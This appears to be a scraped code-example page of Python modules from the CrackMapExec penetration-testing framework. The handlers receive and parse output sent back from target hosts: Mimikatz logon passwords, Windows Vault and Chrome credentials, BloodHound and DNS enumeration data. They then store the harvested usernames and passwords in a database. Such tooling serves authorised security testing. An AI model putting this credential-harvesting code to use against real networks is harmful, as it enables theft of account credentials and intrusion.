コード例 #1
0
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        #We've received the response, stop tracking this host
        response.stop_tracking_host()

        dc_count = 0
        if len(data):
            buf = StringIO(data).readlines()
            for line in buf:
                if line != '\r\n' and not line.startswith('Name') and not line.startswith('---'):
                    try:
                        hostname, domain, ip = filter(None, line.strip().split(' '))
                        hostname = hostname.split('.')[0].upper()
                        domain   = domain.split('.')[0].upper()
                        context.log.highlight('Hostname: {} Domain: {} IP: {}'.format(hostname, domain, ip))
                        context.db.add_computer(ip, hostname, domain, '', dc=True)
                        dc_count += 1
                    except Exception:
                        context.log.error('Error parsing Domain Controller entry')

            context.log.success('Added {} Domain Controllers to the database'.format(highlight(dc_count)))

            log_name = 'Get_NetDomainController-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved raw output to {}".format(log_name))
コード例 #2
0
ファイル: mimikatz.py プロジェクト: 0xe7/CrackMapExec 
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        # We've received the response, stop tracking this host
        response.stop_tracking_host()

        if len(data):
            if self.command.find('sekurlsa::logonpasswords') != -1:
                creds = self.parse_mimikatz(data)
                if len(creds):
                    for cred_set in creds:
                        credtype, domain, username, password,_,_ = cred_set
                        # Get the hostid from the DB
                        hostid = context.db.get_computers(response.client_address[0])[0][0]
                        context.db.add_credential(credtype, domain, username, password, pillaged_from=hostid)
                        context.log.highlight('{}\\{}:{}'.format(domain, username, password))

                    context.log.success("Added {} credential(s) to the database".format(highlight(len(creds))))
            else:
                context.log.highlight(data)

            log_name = 'Mimikatz-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved raw Mimikatz output to {}".format(log_name))
コード例 #3
0
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        #We've received the response, stop tracking this host
        response.stop_tracking_host()

        if len(data):
            if self.command.find('sekurlsa::logonpasswords') != -1:
                creds = self.parse_mimikatz(data)
                if len(creds):
                    for cred_set in creds:
                        credtype, domain, username, password, _, _ = cred_set
                        #Get the hostid from the DB
                        hostid = context.db.get_computers(
                            response.client_address[0])[0][0]
                        context.db.add_credential(credtype, domain, username,
                                                  password, hostid)
                        context.log.highlight('{}\\{}:{}'.format(
                            domain, username, password))

                    context.log.success(
                        "Added {} credential(s) to the database".format(
                            highlight(len(creds))))
            else:
                context.log.highlight(data)

            log_name = 'Mimikatz-{}-{}.log'.format(
                response.client_address[0],
                datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info(
                "Saved raw Mimikatz output to {}".format(log_name))
コード例 #4
0
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        #We've received the response, stop tracking this host
        response.stop_tracking_host()

        dc_count = 0
        if len(data):
            buf = StringIO(data).readlines()
            for line in buf:
                if line != '\r\n' and not line.startswith('Name') and not line.startswith('---'):
                    try:
                        hostname, domain, ip = filter(None, line.strip().split(' '))
                        hostname = hostname.split('.')[0].upper()
                        domain   = domain.split('.')[0].upper()
                        context.log.highlight('Hostname: {} Domain: {} IP: {}'.format(hostname, domain, ip))
                        context.db.add_computer(ip, hostname, domain, '', dc=True)
                        dc_count += 1
                    except Exception:
                        context.log.error('Error parsing Domain Controller entry')

            context.log.success('Added {} Domain Controllers to the database'.format(highlight(dc_count)))

            log_name = 'Get_NetDomainController-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved raw output to {}".format(log_name))
コード例 #5
0
ファイル: bloodhound.py プロジェクト: 0xe7/CrackMapExec 
    def parse_ouput(self, data, context, response):
        '''
        Parse the output from Invoke-BloodHound
        '''

        parsedData = data.split("!-!")
        nameList = ['user_sessions', 'group_membership.csv', 'acls.csv', 'local_admins.csv', 'trusts.csv']
        for x in range(0, len(parsedData)):
            if "ComputerName" in parsedData[x] and "UserName" in parsedData[x] :
                log_name = '{}-{}-{}.csv'.format(nameList[0], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
                write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
                context.log.info("Saved csv output to {}".format(log_name))
            elif "GroupName" in parsedData[x] and "AccountName" in parsedData[x] :
                log_name = '{}-{}-{}.csv'.format(nameList[1], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
                write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
                context.log.info("Saved csv output to {}".format(log_name))
            elif "ComputerName" in parsedData[x] and "AccountName" in parsedData[x] :
                log_name = '{}-{}-{}.csv'.format(nameList[3], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
                write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
                context.log.info("Saved csv output to {}".format(log_name))
            elif "SourceDomain" in parsedData[x] and "TrustType" in parsedData[x] :
                log_name = '{}-{}-{}.csv'.format(nameList[4], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
                write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
                context.log.info("Saved csv output to {}".format(log_name))
            elif "ObjectName" in parsedData[x] and "ObjectType" in parsedData[x] :
                log_name = '{}-{}-{}.csv'.format(nameList[2], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
                write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
                context.log.info("Saved csv output to {}".format(log_name))
コード例 #6
0
 def call_cmd_args(self):
     for k, v in vars(self.args).items():
         if hasattr(self, k) and hasattr(getattr(self, k), '__call__'):
             if v is not False and v is not None:
                 logging.debug('Calling {}()'.format(k))
                 r = getattr(self, k)()
                 if self.export:
                     write_log(str(r), self.export[0])
コード例 #7
0
    def parse_ouput(self, data, context, response):
        '''
        Parse the output from Invoke-BloodHound
        '''

        parsedData = data.split("!-!")
        nameList = [
            'user_sessions', 'group_membership.csv', 'acls.csv',
            'local_admins.csv', 'trusts.csv'
        ]
        for x in range(0, len(parsedData)):
            if "ComputerName" in parsedData[x] and "UserName" in parsedData[x]:
                log_name = '{}-{}-{}.csv'.format(
                    nameList[0], response.client_address[0],
                    datetime.now().strftime("%Y-%m-%d_%H%M%S"))
                write_log(
                    parsedData[x].replace('" "', '"\n"').replace(' "', '"'),
                    log_name)
                context.log.info("Saved csv output to {}".format(log_name))
            elif "GroupName" in parsedData[x] and "AccountName" in parsedData[
                    x]:
                log_name = '{}-{}-{}.csv'.format(
                    nameList[1], response.client_address[0],
                    datetime.now().strftime("%Y-%m-%d_%H%M%S"))
                write_log(
                    parsedData[x].replace('" "', '"\n"').replace(' "', '"'),
                    log_name)
                context.log.info("Saved csv output to {}".format(log_name))
            elif "ComputerName" in parsedData[
                    x] and "AccountName" in parsedData[x]:
                log_name = '{}-{}-{}.csv'.format(
                    nameList[3], response.client_address[0],
                    datetime.now().strftime("%Y-%m-%d_%H%M%S"))
                write_log(
                    parsedData[x].replace('" "', '"\n"').replace(' "', '"'),
                    log_name)
                context.log.info("Saved csv output to {}".format(log_name))
            elif "SourceDomain" in parsedData[x] and "TrustType" in parsedData[
                    x]:
                log_name = '{}-{}-{}.csv'.format(
                    nameList[4], response.client_address[0],
                    datetime.now().strftime("%Y-%m-%d_%H%M%S"))
                write_log(
                    parsedData[x].replace('" "', '"\n"').replace(' "', '"'),
                    log_name)
                context.log.info("Saved csv output to {}".format(log_name))
            elif "ObjectName" in parsedData[x] and "ObjectType" in parsedData[
                    x]:
                log_name = '{}-{}-{}.csv'.format(
                    nameList[2], response.client_address[0],
                    datetime.now().strftime("%Y-%m-%d_%H%M%S"))
                write_log(
                    parsedData[x].replace('" "', '"\n"').replace(' "', '"'),
                    log_name)
                context.log.info("Saved csv output to {}".format(log_name))
コード例 #8
0
    def on_admin_login(self, context, connection):

        data = []
        cards = connection.wmi(f"select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration")
        for c in cards:
            if c['IPAddress'].get('value'):
                context.log.success(f"IP Address: {c['IPAddress']['value']}\tSearch Domain: {c['DNSDomainSuffixSearchOrder']['value']}")
                
        data.append(cards)

        log_name = 'network-connections-{}-{}.log'.format(connection.args.target[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(json.dumps(data), log_name)
        context.log.info("Saved raw output to {}".format(log_name))
コード例 #9
0
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        #We've received the response, stop tracking this host
        response.stop_tracking_host()

        if len(data):
            buf = StringIO(data).readlines()
            creds = []

            try:
                i = 0
                while i < len(buf):
                    if ('Ressource' in buf[i]):
                        url = buf[i].split(':', 1)[1].strip().replace(
                            '[STRING]', '')
                        user = buf[i + 1].split(':', 1)[1].strip().replace(
                            '[STRING]', '')
                        passw = buf[i + 4].split(':', 1)[1].strip().replace(
                            '[STRING]', '')

                        if '[BYTE*]' not in passw:
                            creds.append({
                                'url': url,
                                'user': user,
                                'passw': passw
                            })

                    i += 1
            except:
                context.log.error(
                    'Error parsing Mimikatz output, please check log file manually for possible credentials'
                )

            if creds:
                context.log.success('Found saved Vault credentials:')
                for cred in creds:
                    if cred['user'] and cred['passw']:
                        context.log.highlight('URL: ' + cred['url'])
                        context.log.highlight('Username: '******'user'])
                        context.log.highlight('Password: '******'passw'])
                        context.log.highlight('')

            log_name = 'EnumVaultCreds-{}-{}.log'.format(
                response.client_address[0],
                datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved Mimikatz's output to {}".format(log_name))
コード例 #10
0
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        #We've received the response, stop tracking this host
        response.stop_tracking_host()

        if len(data):
            def print_post_data(data):
                buf = StringIO(data.strip()).readlines()
                for line in buf:
                    context.log.highlight(line.strip())

            print_post_data(data)

            log_name = 'SessionGopher-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved output to {}".format(log_name))
コード例 #11
0
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.get('content-length'))
        data = response.rfile.read(length).decode()

        #We've received the response, stop tracking this host
        response.stop_tracking_host()

        if len(data):
            buf = StringIO(data).readlines()
            for line in buf:
                context.log.highlight(line)

            log_name = 'ChromeDump-{}-{}.log'.format(
                response.client_address[0],
                datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info(
                "Saved raw Get-ChromeDump output to {}".format(log_name))
コード例 #12
0
    def on_admin_login(self, context, connection):

        if not self.domains:
            domains = []
            output = connection.wmi('Select Name FROM MicrosoftDNS_Zone', 'root\\microsoftdns')

            if output:
                for result in output:
                    domains.append(result['Name']['value'])

                context.log.success('Domains retrieved: {}'.format(domains))
        else:
            domains = [self.domains]
        data = ""
        for domain in domains:
            output = connection.wmi('Select TextRepresentation FROM MicrosoftDNS_ResourceRecord WHERE DomainName = "{}"'.format(domain), 'root\\microsoftdns')
            
            if output:
                domain_data = {}
                context.log.highlight("Results for {}".format(domain))
                data += "Results for {}\n".format(domain)
                for entry in output:
                    text = entry['TextRepresentation']['value']
                    rname = text.split(' ')[0]
                    rtype = text.split(' ')[2]
                    rvalue = ' '.join(text.split(' ')[3:])
                    if domain_data.get(rtype, False):
                        domain_data[rtype].append("{}: {}".format(rname, rvalue))
                    else:
                        domain_data[rtype] = ["{}: {}".format(rname, rvalue)]

                for k, v in sorted(domain_data.items()):
                    context.log.highlight("Record Type: {}".format(k))
                    data += "Record Type: {}\n".format(k)
                    for d in sorted(v):
                        context.log.highlight("\t"+d)
                        data += "\t" + d + "\n"

        log_name = 'DNS-Enum-{}-{}.log'.format(connection.args.target[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved raw output to {}".format(log_name))
コード例 #13
0
ファイル: enum_dns.py プロジェクト: 0xe7/CrackMapExec 
    def on_admin_login(self, context, connection):

        if not self.domains:
            domains = []
            output = connection.wmi('Select Name FROM MicrosoftDNS_Zone', 'root\\microsoftdns')

            if output:
                for result in output:
                    domains.append(result['Name']['value'])

                context.log.success('Domains retrieved: {}'.format(domains))
        else:
            domains = [self.domains]
        data = ""
        for domain in domains:
            output = connection.wmi('Select TextRepresentation FROM MicrosoftDNS_ResourceRecord WHERE DomainName = "{}"'.format(domain), 'root\\microsoftdns')
            
            if output:
                domain_data = {}
                context.log.highlight("Results for {}".format(domain))
                data += "Results for {}\n".format(domain)
                for entry in output:
                    text = entry['TextRepresentation']['value']
                    rname = text.split(' ')[0]
                    rtype = text.split(' ')[2]
                    rvalue = ' '.join(text.split(' ')[3:])
                    if domain_data.get(rtype, False):
                        domain_data[rtype].append("{}: {}".format(rname, rvalue))
                    else:
                        domain_data[rtype] = ["{}: {}".format(rname, rvalue)]

                for k, v in sorted(domain_data.iteritems()):
                    context.log.highlight("Record Type: {}".format(k))
                    data += "Record Type: {}\n".format(k)
                    for d in sorted(v):
                        context.log.highlight("\t"+d)
                        data += "\t" + d + "\n"

        log_name = 'DNS-Enum-{}-{}.log'.format(connection.args.target[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved raw output to {}".format(log_name))
コード例 #14
0
ファイル: enum_chrome.py プロジェクト: DeeLMind/CrackMapExec 
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        #We've received the response, stop tracking this host
        response.stop_tracking_host()

        if len(data):
            buf = StringIO(data).readlines()
            for line in buf:
                context.log.highlight(line)

            log_name = 'ChromeDump-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved raw Get-ChromeDump output to {}".format(log_name))

    #def on_shutdown(self, context):
        #context.info('Removing SQLite assembly file')
        #connection.ps_execute('')
コード例 #15
0
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        #We've received the response, stop tracking this host
        response.stop_tracking_host()

        if len(data):
            buf = StringIO(data).readlines()
            creds = []

            try:
                i = 0
                while i < len(buf):
                    if ('Ressource' in buf[i]):
                        url  = buf[i].split(':', 1)[1].strip().replace('[STRING]', '')
                        user = buf[i+1].split(':', 1)[1].strip().replace('[STRING]', '')
                        passw = buf[i+4].split(':', 1)[1].strip().replace('[STRING]', '')

                        if '[BYTE*]' not in passw:
                            creds.append({'url': url, 'user': user, 'passw': passw})

                    i += 1
            except:
                context.log.error('Error parsing Mimikatz output, please check log file manually for possible credentials')

            if creds:
                context.log.success('Found saved Vault credentials:')
                for cred in creds:
                    if cred['user'] and cred['passw']:
                        context.log.highlight('URL: ' + cred['url'])
                        context.log.highlight('Username: '******'user'])
                        context.log.highlight('Password: '******'passw'])
                        context.log.highlight('')

            log_name = 'EnumVaultCreds-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved Mimikatz's output to {}".format(log_name))
コード例 #16
0
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.get('content-length'))
        data = response.rfile.read(length).decode('UTF-8', 'ignore')

        response.stop_tracking_host()

        if len(data):

            def print_post_data(data):
                buf = StringIO(data.strip()).readlines()
                for line in buf:
                    context.log.highlight(line.strip())

            print_post_data(data)

            log_name = 'execute_assembly-{}-{}.log'.format(
                response.client_address[0],
                datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved output to {}".format(log_name))